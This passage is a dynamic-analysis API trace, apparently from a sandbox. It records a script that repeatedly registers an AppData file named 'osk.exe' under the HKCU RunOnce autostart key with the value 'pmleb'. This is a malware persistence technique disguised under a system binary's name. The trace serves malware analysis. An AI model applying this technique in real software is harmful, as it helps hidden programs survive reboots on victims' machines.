ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.628] SetTimer (hWnd=0x20280, nIDEvent=0x21da, uElapse=0xa, lpTimerFunc=0x0) returned 0x21da [0091.628] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.898] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.898] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.898] KillTimer (hWnd=0x20280, uIDEvent=0x21da) returned 1 [0091.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.899] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.899] IUnknown:Release (This=0x787518) returned 0x1 [0091.899] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.899] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.899] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.900] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.900] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0091.900] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.900] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0091.900] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.901] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0091.901] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.901] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.901] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.901] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.901] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.901] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.901] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.902] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.902] RegCloseKey (hKey=0x280) returned 0x0 [0091.902] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.902] SetTimer (hWnd=0x20280, nIDEvent=0x21db, uElapse=0xa, lpTimerFunc=0x0) returned 0x21db [0091.902] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.908] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.909] KillTimer (hWnd=0x20280, uIDEvent=0x21db) returned 1 [0091.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.909] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.909] IUnknown:Release (This=0x787518) returned 0x1 [0091.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.909] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.910] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.910] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0091.910] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.910] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0091.910] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.911] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0091.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.911] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.911] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.911] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.911] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.911] RegCloseKey (hKey=0x280) returned 0x0 [0091.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.912] SetTimer (hWnd=0x20280, nIDEvent=0x21dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21dc [0091.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.922] KillTimer (hWnd=0x20280, uIDEvent=0x21dc) returned 1 [0091.922] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.922] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.922] IUnknown:Release (This=0x787518) returned 0x1 [0091.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.923] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.923] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.923] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.924] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0091.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.924] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0091.924] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.925] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0091.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.925] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.925] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.926] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.926] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.926] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.926] RegCloseKey (hKey=0x280) returned 0x0 [0091.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.927] SetTimer (hWnd=0x20280, nIDEvent=0x21dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21dd [0091.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.936] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.936] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.937] KillTimer (hWnd=0x20280, uIDEvent=0x21dd) returned 1 [0091.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.937] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.937] IUnknown:Release (This=0x787518) returned 0x1 [0091.937] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.938] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 